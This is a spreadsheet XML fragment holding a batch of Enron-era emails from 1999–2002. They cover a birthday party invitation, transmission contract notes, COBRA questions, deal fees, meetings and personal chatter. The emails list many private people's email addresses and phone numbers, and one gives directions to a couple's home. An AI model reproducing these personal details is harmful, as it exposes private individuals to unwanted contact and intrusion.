    <t>frozenset({'twilliams@ev1.net', 'drkubala@thompson-grp.com', 'mstewart@pdq.net', 'stewart@mallia.com', 'lcampbel@enron.com', 'jason.d.moore@carrier.utc.com', 'bsbearden@hotmail.com', 'fast@evi.net.mail', 'chad.starnes@enron.com', 'scottsmith@masterword.com', 'laurence.clayton@enron.com', 'joe.stepenovitch@enron.com', 'jebert@eadslink.com', 'mitch.robinson@enron.com', 'michael_j_newman@reliantenergy.com', 'batoggero@yahoo.com', 'susan.newman@equistarchem.com', 'jkuehler@wecon.com', 'seanpat@aol.com', 'kayne.coulter@enron.com', 'j.purdom@worldnet.att.net', 'cyril.price@enron.com', 'patpol@aol.com', 'wayne.herndon@enron.com', 'rudy.acevedo@enron.com', 'stichavsky@pct-inc.com', 'lstavinoha@themedlehgroup.com', 'ejkorth@flash.net', 'kenneth.d.schall@us.arthurandersen.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'keller.mayeaux@enron.com', 'andrea.p.williams@us.pwcglobal.com', 'ktracey111@aol.com', 'don.baughman@marshmc.com', 'dragcraps@aol.com', 'larry.jester@enron.com', 'john.kinser@enron.com', 'shannontyer@email.msn.com', 'dlaurent@enron.com', 'pad0330@aol.com', 'reidstav@houston.rr.com', 'tbooth87@flash.net', 'david_nobles@ewingcc.com', 'twomarshalls@hotmail.com', 'gsnapka@pdq.net', 'rpearson@oilstates.com'})</t>
  </si>
  <si>
    <t>Re: Don's Birthday Party Invitation</t>
  </si>
  <si>
    <t>Dear Friends,_x000D_
Time to get a head count for the Fahita Dinner for Don Jr.'s Birthday Bash,_x000D_
please send me an e-mail at baughmanpatricia@hotmail.com and let me know_x000D_
today if you will be able to come Friday. For directions: Kari and Sean's_x000D_
home is about 1 block from where 528 and 518 cross. Winding Way is a street_x000D_
1 block East of the above intersection. Go North on Winding Way to the first_x000D_
street, Charleston, turn right, and their home is at the end on the right._x000D_
Winding Way connects 518 and 528.Please call me or Kari for any questions_x000D_
and look forward to enjoying the evening with ya'll. Love, Pat Baughman_x000D_
_x000D_
_x000D_
&gt;From: "Troy Williams" &lt;twilliams@ev1.net&gt;_x000D_
&gt;To: "Don C Baughman" &lt;don.baughman@marshmc.com&gt;, "Bobbie Bearden"_x000D_
&gt;&lt;bsbearden@hotmail.com&gt;, "Peggy Dickerson" &lt;Pad0330@aol.com&gt;, "Susan_x000D_
&gt;Newman" &lt;susan.newman@equistarchem.com&gt;, &lt;baughmanpatricia@hotmail.com&gt;,_x000D_
&gt;"Kari" &lt;ktracey111@aol.com&gt;, "Sean Tracey" &lt;seanpat@aol.com&gt;,_x000D_
&gt;&lt;o_briandave@hotmail.com&gt;, "shannon" &lt;shannontyer@email.msn.com&gt;, "reid_x000D_
&gt;stav" &lt;reidstav@houston.rr.com&gt;, "Lalenia Stav"_x000D_
&gt;&lt;lstavinoha@themedlehgroup.com&gt;, "eric korth" &lt;ejkorth@flash.net&gt;,_x000D_
&gt;&lt;tbooth87@flash.net&gt;, &lt;twomarshalls@hotmail.com&gt;, &lt;fast@evi.net.mail&gt;,_x000D_
&gt;"Andrea Williams" &lt;andrea.p.williams@us.pwcglobal.com&gt;,_x000D_
&gt;&lt;jason.d.moore@carrier.utc.com&gt;, &lt;jkuehler@wecon.com&gt;,_x000D_
&gt;&lt;jebert@eadslink.com&gt;, &lt;gsnapka@pdq.net&gt;,_x000D_
&gt;&lt;Michael_J_Newman@reliantenergy.com&gt;, "Bat Oggero" &lt;batoggero@yahoo.com&gt;,_x000D_
&gt;&lt;Dragcraps@aol.com&gt;, &lt;kenneth.d.schall@us.arthurandersen.com&gt;,_x000D_
&gt;&lt;stichavsky@pct-inc.com&gt;, &lt;j.purdom@worldnet.att.net&gt;,_x000D_
&gt;&lt;david_nobles@ewingcc.com&gt;, &lt;rpearson@oilstates.com&gt;,_x000D_
&gt;&lt;scottsmith@masterword.com&gt;, &lt;drkubala@thompson-grp.com&gt;, &lt;patpol@aol.com&gt;,_x000D_
&gt;&lt;john.kinser@enron.com&gt;, &lt;lcampbel@enron.com&gt;, &lt;cyril.price@enron.com&gt;,_x000D_
&gt;&lt;rudy.acevedo@enron.com&gt;, &lt;richard.hrabal@enron.com&gt;,_x000D_
&gt;&lt;juan.hernandez@enron.com&gt;, &lt;kayne.coulter@enron.com&gt;,_x000D_
&gt;&lt;mitch.robinson@enron.com&gt;, &lt;chad.starnes@enron.com&gt;,_x000D_
&gt;&lt;larry.jester@enron.com&gt;, &lt;wayne.herndon@enron.com&gt;,_x000D_
&gt;&lt;joe.stepenovitch@enron.com&gt;, &lt;keller.mayeaux@enron.com&gt;,_x000D_
&gt;&lt;laurence.clayton@enron.com&gt;, &lt;dlaurent@enron.com&gt;, "marc stewart"_x000D_
&gt;&lt;stewart@mallia.com&gt;, &lt;mstewart@pdq.net&gt;_x000D_
&gt;Subject: Don's Birthday Party Invitation_x000D_
&gt;Date: Thu, 9 Nov 2000 21:19:40 -0600_x000D_
&gt;_x000D_
&gt;We look forward to seeing everyone!_x000D_
&gt;&lt;&lt; don_sbirthdayinvitation.exe &gt;&gt;_x000D_
_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com.</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 06:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com', 'kay.mann@enron.com', 'reagan.rorschach@enron.com', 'lloyd.will@enron.com'})</t>
  </si>
  <si>
    <t>Re: Clarksdale/Yazoo City</t>
  </si>
  <si>
    <t xml:space="preserve">p. 8 "Electric Transmission"  -- Would be interesting to find out what the 25 _x000D_
MW of firm transmission is that Entergy "committed to."  Also, a customer _x000D_
does not have transmission until it is confirmed on OASIS.  Either PTP (firm _x000D_
or non-firm) or the additional off system resources (have to list a source) _x000D_
under network would need to be purchased for wheeling in and out of Entergy _x000D_
to make parking/lending effective. _x000D_
_x000D_
p.9 "Delivery Point"   --This point is actually the "POR" /Point of Receipt _x000D_
for tariff purposes if generating the power or the POD/Point of Delivery if _x000D_
wheeling into Clarksdale._x000D_
_x000D_
p. 10  says that EPMI would manage the existing firm transmission rights.  As _x000D_
of now, I don't think Clarksdale has the transmission rights (since Marvin is _x000D_
submitting the request today).  Therefore, for contract purposes, want to _x000D_
have language that gives them the risk of not getting transmission approved _x000D_
by Entergy.  Firm can be difficult to obtain.  Can also include a provision _x000D_
that non-firm could be used, if available, but EPMI probably does not want to _x000D_
take any transmission risk.  Non-firm is close to non-existent in the _x000D_
summer.  _x000D_
_x000D_
p. 12  Be careful about using the term "balanced schedules" for supply, load _x000D_
and transmission capacity from all entities it serves.  We are fighting any _x000D_
RTO requirements for day ahead balanced schedules.  NERC in May is _x000D_
considering changes certain rules that would allow marketers, etc. the _x000D_
advantages of parking and lending through the submission of schedules _x000D_
(although it probably won't pass.)  In any event, I think that "appropriate _x000D_
schedules, as required by the SPP (or successor organization) rules, _x000D_
practices, etc...." is safer language._x000D_
_x000D_
Thanks.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Reagan Rorschach@ENRON_x000D_
02/28/2001 12:15 PM_x000D_
To: Christi L Nicolay/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Clarksdale/Yazoo City_x000D_
_x000D_
Christi-_x000D_
_x000D_
See attached.  Call me with any questions._x000D_
_x000D_
Thanks very much,_x000D_
_x000D_
Reagan_x000D_
5.3363_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 02:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dolores.lenfest@enron.com'})</t>
  </si>
  <si>
    <t>FW: Current Cobra participants</t>
  </si>
  <si>
    <t xml:space="preserve">What is the answer?  Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 12/08/2000 10:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Steve Hamilton &lt;Steve@ECOGAS.com&gt; on 12/08/2000 10:18:44 AM_x000D_
To: "'michelle.cash@enron.com'" &lt;michelle.cash@enron.com&gt;_x000D_
cc: Kelly Mahmoud &lt;Kelly@ECOGAS.com&gt;, Marie &lt;Marie@ECOGAS.com&gt;, Geoffrey _x000D_
Brown &lt;Geoff@ECOGAS.com&gt; _x000D_
Subject: FW: Current Cobra participants_x000D_
_x000D_
_x000D_
Michelle:_x000D_
_x000D_
Could you please answer this question?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steve_x000D_
_x000D_
-----Original Message-----_x000D_
From: Marie_x000D_
Sent: Thursday, December 07, 2000 4:46 PM_x000D_
To: Kelly Mahmoud; Steve Hamilton_x000D_
Subject: Current Cobra participants_x000D_
_x000D_
What happens to those people that are currently on Ecogas cobra when Ecogas_x000D_
is no longer in existence? They have not utilized the 18 months that they_x000D_
would be entitled to receive those benefits. Is Enron going to pick them up_x000D_
like they did for the 10/13/00 layoff? Do we need to direct this question to_x000D_
someone at Enron?_x000D_
_x000D_
Marie_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 23:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'roy_dealy@veritasdgc.com'})</t>
  </si>
  <si>
    <t>Re: Tuesday - 11/21</t>
  </si>
  <si>
    <t>i will be out of town for the game</t>
  </si>
  <si>
    <t>Sat, 1 Dec 2001 09:22:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: VEPCO</t>
  </si>
  <si>
    <t>Yes!  Do you need it today or can it wait untilmonday?_x000D_
Heather Kroll_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mann, Kay &lt;Kay.Mann@ENRON.com&gt;_x000D_
To: Kroll, Heather &lt;Heather.Kroll@ENRON.com&gt;_x000D_
Sent: Sat Dec 01 09:43:15 2001_x000D_
Subject: VEPCO_x000D_
_x000D_
Could you send me the notice of default and our response?  Thanks!</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 06:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deal 507756</t>
  </si>
  <si>
    <t>For ref 507756 Amerex shows a fee of $.0275.  Can you check with Mike _x000D_
Swerzbin b/c we show a fee of $.0075._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2000 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Susan Bailey's ETA is 9-9:30 a.m. today</t>
  </si>
  <si>
    <t xml:space="preserve">Taffy told me that Susan's husband had court this morning so she is late.  Is _x000D_
this weird or am I weird?  Sara_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 04/13/2000 _x000D_
10:29 AM ---------------------------_x000D_
_x000D_
_x000D_
Taffy Milligan_x000D_
04/13/2000 08:49 AM_x000D_
To: Susan Bailey/HOU/ECT@ECT, Susan Flynn/HOU/ECT@ECT, Marie _x000D_
Heard/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Carol _x000D_
St Clair/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Susan Bailey's ETA is 9-9:30 a.m. today_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 12:01:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.millar@enron.com', 'ken.powers@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'eric.gadd@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'courtney.barker@enron.com', 'craig.buehler@enron.com', 'rosemary.gracey@enron.com', 'laura.lantefield@enron.com', 'bob.stevens@enron.com', 'julie.armstrong@enron.com', 'connie.hook@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'tk.lohman@enron.com', 'lorna.brennan@enron.com', 'lisa.valley@enron.com', 'vicki.berg@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'roger.westfall@enron.com', 'audrey.robertson@enron.com', 'tim.johanson@enron.com', 'allen.cohrs@enron.com', 'frank.semin@enron.com', 'chuck.wilkinson@enron.com', 'penny.mccarran@enron.com', 'w..mcgowan@enron.com', 'jo.williams@enron.com', 'india.torres@enron.com', 'martha.janousek@enron.com', 'jane.joyce@enron.com', 'robert.mason@enron.com', 'g..stage@enron.com', 'john.pritchard@enron.com', 'sean.bolks@enron.com', 'stephanie.korbelik@enron.com', 'larry.pavlou@enron.com', 'dana.jones@enron.com', 'pilar.ramirez@enron.com', 'steve.thomas@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'reyna.cabrera@enron.com', 'lee.ferrell@enron.com', 'john.fiscus@enron.com', 'john.williams@enron.com', 'kimberly.watson@enron.com', 'preston.roobaert@enron.com', 'stephen.herber@enron.com', 'steven.harris@enron.com', 'sue.neville@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'danny.mccarty@enron.com', 'lorraine.lindberg@enron.com', 'julie.mccoy@enron.com', 'lindy.donoho@enron.com', 'pallavi.goradia@enron.com', 'linda.wehring@enron.com', 'chris.sebesta@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'susan.wadle@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>Phone List Correction</t>
  </si>
  <si>
    <t>_x000D_
The extension for Steve Thomas is 7468.  Attached is corrected copy._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Deb Cappiello_x000D_
Northern Natural Gas Company_x000D_
Business Development &amp; Marketing_x000D_
402-398-7098_x000D_
Fax:  402-398-7445_x000D_
e-mail: deb.cappiello@enron.com</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/22/2000 _x000D_
04:44 PM ---------------------------_x000D_
_x000D_
_x000D_
"Btu" &lt;subs@btu.net&gt; on 12/22/2000 03:40:27 PM_x000D_
To: "Btu Weekly" &lt;&gt;_x000D_
cc:  _x000D_
Subject: Btu Weekly_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest issue of Btu Weekly._x000D_
_x000D_
e-mail: info@Btu.net_x000D_
phone: 732-758-8222_x000D_
fax: 732-758-8286_x000D_
_x000D_
_x000D_
 - wg122500.pdf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 08:39:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'presched2@power.bpa.gov'})</t>
  </si>
  <si>
    <t>COB contracts for December</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
Here are the direct bookouts I have matched up along with my options I only show open COB contracts on the LLH_x000D_
_x000D_
_x000D_
Give me a call when you are ready to go.</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 05:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Netting, Purchase/Sale Agreement w/ MarkWest Hydrocarbon</t>
  </si>
  <si>
    <t>I spoke with Ms. Renken the end of March at which time we had reached an _x000D_
impasse on  Force Majeure  issues as well as others.   I am attaching their _x000D_
redline for you to see.  Please note also their requested changes to credit _x000D_
sections._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 07:50:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.olsen@enron.com', 'david.baumbach@enron.com', 'houston &lt;.ward@enron.com&gt;', 'a..martin@enron.com', 'brian.redmond@enron.com', 'barry.tycholiz@enron.com', 'morris.larubbio@enron.com', 'jd.buss@enron.com', 'eric.bass@enron.com', 'stephanie.miller@enron.com', 'gary.bryan@enron.com', 'charles.weldon@enron.com'})</t>
  </si>
  <si>
    <t>FW: Fundamentals Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Tuesday, February 05, 2002 9:22 AM_x000D_
To:	Vuittonet, Laura; Rangel, Ina; Young, Becky; Hogan, Irena D._x000D_
Subject:	RE: Fundamentals Presentation _x000D_
_x000D_
This meeting has been changed to Thursday, Feb 7th from 2-4 p.m.  It will be held in the same conference room (ECS06990). _x000D_
_x000D_
Thanks, _x000D_
Amanda _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Monday, February 04, 2002 10:24 AM_x000D_
To:	Vuittonet, Laura; Rangel, Ina; Young, Becky; Hogan, Irena D._x000D_
Subject:	Fundamentals Presentation _x000D_
_x000D_
Assistants, please forward to your groups._x000D_
_x000D_
_x000D_
The Fundamentals group is giving a presentation tomorrow, Feb 5th from 2-4 in room ECS06990._x000D_
_x000D_
The topic will be the Gas Market.  _x000D_
    _x000D_
Thanks, _x000D_
_x000D_
Amanda Rybarski_x000D_
Gas Fundamentals _x000D_
Office: (713) 853-4384_x000D_
Fax: (713) 646-8453_x000D_
Pager: (877) 482-0772_x000D_
Cell: (713) 560-0934_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 18:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janetgj@erols.com'})</t>
  </si>
  <si>
    <t>new house</t>
  </si>
  <si>
    <t>How are things going with the houses? Love Ma_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Thu, 16 Dec 1999 06:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'barbara.dillard@enron.com'})</t>
  </si>
  <si>
    <t>Re: Project Aruba Closing Dinner</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the invitation.  Unfortunately, I will be on vacation next week _x000D_
and will not be able to attend.  Have fun!  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Barbara G Dillard_x000D_
12/16/99 09:51 AM_x000D_
To: Barbara G Dillard/HOU/ECT@ECT_x000D_
cc:  (bcc: Sally Beck/HOU/ECT)_x000D_
Subject: Project Aruba Closing Dinner_x000D_
_x000D_
******The time of the party has been changed to 6:30 p.m. - should you have _x000D_
any questions I can be reached by pager (1-800-917-0654) or e-mail.******_x000D_
_x000D_
Barbara_x000D_
_x000D_
_x000D_
You're invited to a Party in honor of all the individuals whose hard work and _x000D_
dedication helped in the closing of the Project Aruba deal.  We would be _x000D_
honored if you can attend._x000D_
_x000D_
Please R. S. V. P. to me by e-mail no later than Friday, December 17, 1999, _x000D_
12:00 p.m. if you will be attending (The restaurant will be open exclusively _x000D_
for our party)._x000D_
_x000D_
The following are the details:_x000D_
_x000D_
 Date:  Monday, December 20, 1999_x000D_
 Time:  7:30 p.m.   6:30 p.m._x000D_
 Place:  Daily Review Cafe (corner of Dunlavy and Lamar)_x000D_
_x000D_
Hope you can make it!!!!  _x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Feb 2000 06:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kfku@dynegy.com'})</t>
  </si>
  <si>
    <t>RE: License</t>
  </si>
  <si>
    <t>Let me know if you ever sign off on any bridges or buildings so I can stay the_x000D_
hell away from them.  Remember I took classes with you I know better.  _x000D_
Congrats_x000D_
from just an "EIT".   Kyle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Glover, Rusty" &lt;rglover@halff.com&gt; on 01/31/2000 05:13:48 PM_x000D_
_x000D_
To:   'Camille Davis' &lt;kcdavis@pdq.net&gt;_x000D_
cc:   "ROCHELLE (E-mail)" &lt;AggieEngineer@email.msn.com&gt;, "CHERYL (E-mail)"_x000D_
      &lt;ckhalla@swbell.net&gt;, "DAREN (E-mail)" &lt;DFARMER@ECT.ENRON.COM&gt;, Kyle_x000D_
      Kubin/NGCCorp@NGCCorp, "FENNY (E-mail)" &lt;clay@ectisp.net&gt;, "ED (E-mail)"_x000D_
      &lt;EDCOM@TEXAS.NET&gt;, "GREG (E-mail)" &lt;glover@neto.com&gt;_x000D_
_x000D_
Subject:  RE: License_x000D_
_x000D_
_x000D_
_x000D_
TO ALL:_x000D_
_x000D_
     WELL, LET ME TELL IT TO YOU LIKE THIS!  I WILL NEVER EVER EVER HAVE_x000D_
TO STUDY FOR ANOTHER FRICKEN EXAM!  HELL YES I PASSED THAT S.O.B.  I ABOUT_x000D_
DIED WHEN I OPENED THE ENVELOPE B/C I COULDN'T BELIEVE IT!  I AM NOW RUSTY_x000D_
R. GLOVER, P.E.!  I PROBABLY WON'T KNOW YOU NEXT TIME I SEE YOU!  MY HEAD_x000D_
WAS SO BIG THIS MORNING I COULD BARELY MAKE IT THROUGH THE DOOR!_x000D_
_x000D_
_x000D_
LATER,_x000D_
_x000D_
RUSTY R. GLOVER, P.E._x000D_
_x000D_
-----Original Message-----_x000D_
From: Camille Davis [mailto:kcdavis@pdq.net]_x000D_
Sent: Monday, January 31, 2000 1:59 PM_x000D_
To: Glover, Rusty_x000D_
Subject: License_x000D_
_x000D_
_x000D_
Did you past your test???_x000D_
_x000D_
Camille_x000D_
_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 02:05:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Wade Cline</t>
  </si>
  <si>
    <t>Sandeep,_x000D_
_x000D_
Thanks. Any resolution to Krishna's problem yet?_x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kohli, Sandeep  _x000D_
Sent:	Wednesday, June 27, 2001 7:53 PM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	Wade Cline_x000D_
_x000D_
Vince,_x000D_
_x000D_
Wade was in town today and I caught him for lunch.  I conveyed your thanks for his efforts with the US Embassy on Krishna's behalf.  _x000D_
_x000D_
I also had a disucssion with him on Dabhol, and will give you the details upon return.  The gist is that though we are unsure, 90% probability is in the direction of terminating the PPA and arbitrating._x000D_
_x000D_
Regards,_x000D_
Sandeep.</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 00:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shirley.crenshaw@enron.com', 'clayton.vernon@enron.com'})</t>
  </si>
  <si>
    <t>Re: seminar on beyond ols</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Can you reserve the room for Tue, Dec 19, 3:30?_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/08/2000 _x000D_
08:33 AM ---------------------------_x000D_
_x000D_
_x000D_
	Clayton Vernon @ ENRON_x000D_
	12/07/2000 05:38 PM_x000D_
	_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: seminar on beyond ols  _x000D_
_x000D_
Vince-_x000D_
_x000D_
George just "remembered" the traders' meetings Monday and Wednesday _x000D_
afternoons at 3:30. He' s going to email you- I think Tuesday would ensure a _x000D_
turnout of traders as well as analysts. We  could easily have 20 people there _x000D_
from Power alone, and there's always Gas .... When you decide the time,  can _x000D_
you ask Shirley to reserve a conference room along the size of 30C1?_x000D_
_x000D_
Clayton_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 18:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'junek@enron.com', 'djunek@aeglobalmarkets.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Things are always crazy around you, even when the rest of the world is sitting still._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Junek, Daniel" &lt;DJunek@aeglobalmarkets.com&gt; on 05/14/2001 03:52:21 PM_x000D_
To:	"'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:	 _x000D_
Subject:	RE:_x000D_
_x000D_
_x000D_
not a one.  i don't even have a phone yet.  We moved into a new office today_x000D_
(my first day) so things are a little crazy around here._x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: Monday, May 14, 2001 4:50 PM_x000D_
To: DJunek@aeglobalmarkets.com_x000D_
Subject: Re:_x000D_
_x000D_
_x000D_
_x000D_
How many deals have you done????_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Junek, Daniel" &lt;DJunek@aeglobalmarkets.com&gt; on 05/14/2001 01:08:49 PM_x000D_
_x000D_
To:   "'chris.germany@enron.com'" &lt;chris.germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:_x000D_
_x000D_
_x000D_
Chris_x000D_
     This in my new email address_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 04:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kristy.carnes@enron.com'})</t>
  </si>
  <si>
    <t>Ravi's Schedule for next week</t>
  </si>
  <si>
    <t>Project Hamachi lives on!  John Griebling asked the crew to come back for _x000D_
March 7 - 10 th._x000D_
_x000D_
Kristy, please book me to come back to project hamachi (Omin hotel in _x000D_
Broomfield).  That is, I need to come back to Broomfield, CO next week tues:_x000D_
_x000D_
Arrive at Omin hotel and be in the office here at 12:00 noon  March 7th, _x000D_
2000.  So I need to take the earliest flight out of Houston to get to Denver _x000D_
airport in time to get to the hotel checked in, etc....  So I need to land _x000D_
~10 AM._x000D_
_x000D_
I'll come back to Houston end of day Friday._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ravi.</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 09:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'john.sherriff@enron.com', 'anita.luong@enron.com', 'jshankm@enron.com', 'ted.murphy@enron.com', 'veronica.valdez@enron.com', 'cliff.baxter@enron.com', 'rick.buy@enron.com', 'john.lavorato@enron.com', 'david.delainey@enron.com', 'sally.beck@enron.com', 'mark.frevert@enron.com', 'chris.abel@enron.com', 'cassandra.schultz@enron.com', 'shona.wilson@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>New Line Item</t>
  </si>
  <si>
    <t xml:space="preserve">F.Y.I. Japanese Electricity is the newest item added to the Daily Position _x000D_
Report.  A new deal was entered and is reflected on the 1/30/01 Final DPR.  _x000D_
It is listed in the Enron Europe sub-heading, under the Enron Wholesale _x000D_
Services title._x000D_
_x000D_
Kenneth Thibodeaux  </t>
  </si>
  <si>
    <t>Fri, 31 May 2002 15:14:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.brady@enron.com', 'robin.barbe@enron.com', 'mike.mazowita@enron.com'})</t>
  </si>
  <si>
    <t>Ponderosa Activity for June 2002</t>
  </si>
  <si>
    <t>I'm out on Monday._x000D_
_x000D_
I didn't sell any gas for the 1st through the 3rd.  _x000D_
_x000D_
Lone Star is doing some pigging for the 4th, 5th, and 6th and its going to have and impact on our supply.  Kevin has been in touch with Cinergy and Williams._x000D_
_x000D_
Robin, I don't know if you will be able to sell any gas during the outage.  Check with Mike to see what he wants to do, then check with Kevin to see where the gas is coming in at.  I left the contracts on your desk and I will call you Monday morning.</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 03:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.mendez@enron.com'})</t>
  </si>
  <si>
    <t>New Power</t>
  </si>
  <si>
    <t>My contacts at The New Power company said you should call this number  _x000D_
1-888-926-9988.</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Annual Aggie Happy Hour with the satan worshipers...</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Monique Sanchez/HOU/ECT on 11/16/2000 _x000D_
12:26 PM ---------------------------_x000D_
_x000D_
_x000D_
"Robert A. Parry, M.S., DABMP" &lt;rparry@bcm.tmc.edu&gt; on 11/16/2000 10:52:56 AM_x000D_
To: "Jarrod \(Work\)" &lt;Jarrod.Haughn@ey.com&gt;, "Monique" _x000D_
&lt;Monique.Sanchez@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: Annual Aggie Happy Hour with the satan worshipers..._x000D_
_x000D_
_x000D_
_x000D_
Sorry Enron people, didn't mean to  neglect you..._x000D_
?_x000D_
----- Original Message -----  _x000D_
From: Robert A. Parry, M.S.,  DABMP _x000D_
To: Jared Mermis ; Sean ; Scott Woloson ; Rob  Boughton ; Matt ; Loftus &amp; Lea _x000D_
; John RM ; A. Stroh ; Danny Oliver  (Work) _x000D_
Sent: Thursday, November 16, 2000 10:49 AM_x000D_
Subject: Annual Aggie Happy Hour with the satan  worshipers..._x000D_
_x000D_
is tonight at Sherlock's on Westheimer  (the original). Trip and his _x000D_
shorthorn wife have informed me that we should go.  That's enough for me!_x000D_
?_x000D_
BTHOtu!_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 02:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EOL (CUSTOMER) PASSWORD</t>
  </si>
  <si>
    <t xml:space="preserve">Stephanie, as per the EOL help line, can you please set up my ID and _x000D_
Password  for Enron On Line today?_x000D_
_x000D_
_x000D_
Thanks.  Joe Quenet  </t>
  </si>
